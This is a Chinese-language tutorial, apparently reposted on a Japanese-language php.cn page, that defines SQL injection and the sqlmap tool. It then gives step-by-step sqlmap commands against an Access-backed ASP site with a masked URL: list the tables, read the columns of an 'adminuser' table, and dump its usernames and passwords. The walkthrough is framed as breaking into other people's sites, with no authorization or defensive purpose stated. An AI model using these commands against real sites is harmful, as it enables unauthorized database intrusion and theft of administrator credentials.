sqlmap注入Access

Jun 07, 2016 pm 03:05 PM
access sql sqlmap 攻撃 注射

什么是SQL 注入 攻击? SQL 注入 攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员 也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的

  什么是SQL注入攻击?
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员
也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合
法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的
数据,这就是所谓的SQL Injection,即SQL注入

什么是SQLMap?
SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞和接管数据库服务器的过程。它通过了一个强
大的检测引擎,最终渗透测试和广泛的从数据库中的指纹持久的开关,对从数据库中提取数据,访问底层的文件系统和操作
系统执行命令的许多利基功能带外连接。
项目网站:http://sqlmap.sourceforge.net/
支持的数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB 

看到了吧,几乎囊括了市面上所有的数据库
下载:http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz  最新版本 0.9

安装 
sqlmap使用Python编写,解压之后直接使用
tar zxvf sqlmap-0.9.tar.gz
cd sqlmap-0.9/
运行
python sqlmap.py
or 
chmod +x sqlmap.py
./sqlmap.py
帮助
python sqlmap.py -h
选项比较多
看不下去的童鞋可以先移步这里

网上几乎就只能看到帮助、说明的之类的,实例太少了,希望大家都踊跃发言,一起研究。

针对Access数据库一般就只能爆表,爆数据了(为避免不必要的麻烦,URL用www.xxx.com代替,你懂的)

./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --table  -u "你要注入的URL" --table 爆表

中间会出来一个让你输入线程的问号 你输入一个数字 5  ==都可以
它就会开始跑表了

跑出来这么几个表,聪明的童鞋一看就知道那个表会有我们想要的东西

下面开始爆指定表的列名,这里爆adminuser
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --columns -T amdinuser

已经出来了,你可以使用Ctrl+C停止,也可以耐心的再等等

爆数据吧
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --dump -T adminuser -C username,password
一会儿结果就出了

このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットな記事タグ

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

Hibernate フレームワークにおける HQL と SQL の違いは何ですか? Hibernate フレームワークにおける HQL と SQL の違いは何ですか? Apr 17, 2024 pm 02:57 PM

Hibernate フレームワークにおける HQL と SQL の違いは何ですか?

Windows 11 でバックグラウンド アプリケーションを無効にする方法_バックグラウンド アプリケーションを無効にする Windows 11 チュートリアル Windows 11 でバックグラウンド アプリケーションを無効にする方法_バックグラウンド アプリケーションを無効にする Windows 11 チュートリアル May 07, 2024 pm 04:20 PM

Windows 11 でバックグラウンド アプリケーションを無効にする方法_バックグラウンド アプリケーションを無効にする Windows 11 チュートリアル

DeepSeek PDFを変換する方法 DeepSeek PDFを変換する方法 Feb 19, 2025 pm 05:24 PM

DeepSeek PDFを変換する方法

iPhoneのカメラとマイクへのアクセスを許可できません iPhoneのカメラとマイクへのアクセスを許可できません Apr 23, 2024 am 11:13 AM

iPhoneのカメラとマイクへのアクセスを許可できません

Javaでdaoは何を意味しますか Javaでdaoは何を意味しますか Apr 21, 2024 am 02:08 AM

Javaでdaoは何を意味しますか

Javaでフィールドは何を意味しますか Javaでフィールドは何を意味しますか Apr 25, 2024 pm 10:18 PM

Javaでフィールドは何を意味しますか

Oracle ストアド プロシージャの実行計画を読み取る方法 Oracle ストアド プロシージャの実行計画を読み取る方法 Apr 18, 2024 pm 10:18 PM

Oracle ストアド プロシージャの実行計画を読み取る方法

Java リフレクション メカニズムはクラスの動作をどのように変更しますか? Java リフレクション メカニズムはクラスの動作をどのように変更しますか? May 03, 2024 pm 06:15 PM

Java リフレクション メカニズムはクラスの動作をどのように変更しますか?

See all articles